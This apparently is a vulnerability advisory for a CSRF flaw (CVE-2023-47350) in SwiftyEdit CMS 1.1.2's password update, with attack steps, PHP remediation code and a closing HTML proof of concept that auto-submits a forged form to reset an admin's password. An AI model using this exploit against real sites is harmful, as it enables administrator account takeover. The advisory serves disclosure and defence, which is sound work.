Mechaneus Security Research and Bug Hunting


CVE-2023-47350: Cross-Site Request Forgery (CSRF) vulnerability in the user password update functionality in SwiftyEdit CMS v1.1.2

https://github.com/SwiftyEdit/SwiftyEdit

Vulnerability Type

CWE-352: Cross-Site Request Forgery (CSRF)

CVSS 8.8 HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Description

The web application does not employ CSRF tokens to protect the ‘Update Password’ function on the user ‘Profile’ page. Because the password change is authorised by the session cookie alone, any site that can make a logged-in user’s browser submit the form can change that user’s password without their knowledge. The impact is greatest when the victim is an administrator.

Execution steps

  1. The threat actor crafts a malicious link or HTML page that, when loaded by the target admin, submits a password change request for the admin’s account. The page can be disguised as something harmless, such as a notification or an update notice.
  2. The admin, unaware of the malicious intent, clicks the link or loads the page.
  3. Because the admin is logged into the web application, the browser attaches the session cookie to the forged POST, so the request reaches the server exactly as a legitimate password change would.
  4. The web application has no CSRF token to check, so it processes the request and sets the admin’s password to the value chosen by the attacker.
  5. The attacker logs in with the new password and has full access to the admin account, leading to data theft, privilege escalation or other malicious actions.

Impact

This Cross-Site Request Forgery vulnerability in SwiftyEdit CMS 1.1.2 may allow an unauthenticated threat actor to escalate their privileges to administrator. A malicious user can lure an administrator into loading the HTML markup and trigger a change of the administrator’s password to any value of the attacker’s choosing. The malicious user can then log in as the administrator and create, edit and delete any content in the CMS, and edit or delete users of any privilege level.

Remediation

Implement and enforce a CSRF token for the ‘Update Password’ functionality in the user ‘Profile’. The token should be generated with a cryptographically secure random source, be unique to each user session, be embedded in the form (never readable from another origin), and be validated on the server with a constant-time comparison before the action proceeds. As additional layers, reject POSTs whose Origin/Referer header does not match the site, set the session cookie with the SameSite attribute, and require the current password before accepting a new one.
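The following PHP is an added example of that remediation and is not SwiftyEdit’s own code. It assumes a hypothetical /profile/ handler and reuses the field names seen in the proof of concept below (s_psw, s_psw_repeat, update_psw_data); the csrf_token field name and the commented persistence and current-password calls are assumptions for illustration.

```php
<?php
// Added example, not SwiftyEdit's own code: a per-session CSRF token guarding
// a hypothetical /profile/ password-update handler.
declare(strict_types=1);

session_start();

// Issue one unpredictable token per session and reuse it for that session.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Compare the submitted token against the session token in constant time.
function csrf_valid(?string $submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    return is_string($submitted)
        && $expected !== ''
        && hash_equals($expected, $submitted);
}

// Defence in depth: refuse POSTs whose Origin (or Referer) host is not ours.
// Hard-code the expected host rather than trusting HTTP_HOST from the request.
function same_origin(string $expected_host): bool
{
    $origin = $_SERVER['HTTP_ORIGIN'] ?? $_SERVER['HTTP_REFERER'] ?? '';
    if ($origin === '') {
        return false; // conservative: no Origin/Referer is treated as cross-site
    }
    $host = parse_url($origin, PHP_URL_HOST);
    return is_string($host) && strcasecmp($host, $expected_host) === 0;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['update_psw_data'])) {
    if (!same_origin('swiftyedit') || !csrf_valid($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid request origin or CSRF token.');
    }
    // Assumed hardening: also require the current password before rotating it.
    // if (!password_verify($_POST['s_psw_current'] ?? '', $current_hash)) { ... }
    $new = $_POST['s_psw'] ?? '';
    if ($new === '' || $new !== ($_POST['s_psw_repeat'] ?? '')) {
        http_response_code(400);
        exit('Passwords do not match.');
    }
    $hash = password_hash($new, PASSWORD_DEFAULT);
    // update_user_password($_SESSION['user_id'], $hash); // hypothetical persistence call
    // Rotate the token after a sensitive action so a leaked value is single-use.
    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    exit('Password updated.');
}
?>
<!-- The legitimate profile form carries the token; a cross-site page cannot read it. -->
<form action="/profile/" method="POST">
  <input type="hidden" name="csrf_token" value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES) ?>">
  <input type="password" name="s_psw">
  <input type="password" name="s_psw_repeat">
  <button type="submit" name="update_psw_data" value="Update">Update</button>
</form>
```

With this in place, replaying the proof-of-concept page below yields a 403, because the forged POST carries neither a matching Origin nor the session’s csrf_token. Setting the session cookie with SameSite=Lax (or Strict) keeps the cookie off cross-site POSTs entirely, which is a cheap extra layer but not a replacement for the token check.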

Proof of Concept code

Create an HTML file and add the following markup. Serving it to a logged-in administrator is enough; the form targets the password update endpoint and the script submits it automatically, so no click is required.

<html>
  <body>
    <!-- Forged POST to the profile password update handler; the victim's session cookie is attached by the browser. -->
    <form action="http://swiftyedit/profile/" method="POST">
      <!-- &#95; is the HTML entity for "_", so the field names decode to s_psw, s_psw_repeat and update_psw_data. -->
      <input type="hidden" name="s&#95;psw" value="1234" />
      <input type="hidden" name="s&#95;psw&#95;repeat" value="1234" />
      <input type="hidden" name="update&#95;psw&#95;data" value="Update" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      // Hide the attacker page's URL from the history entry, then submit without user interaction.
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

References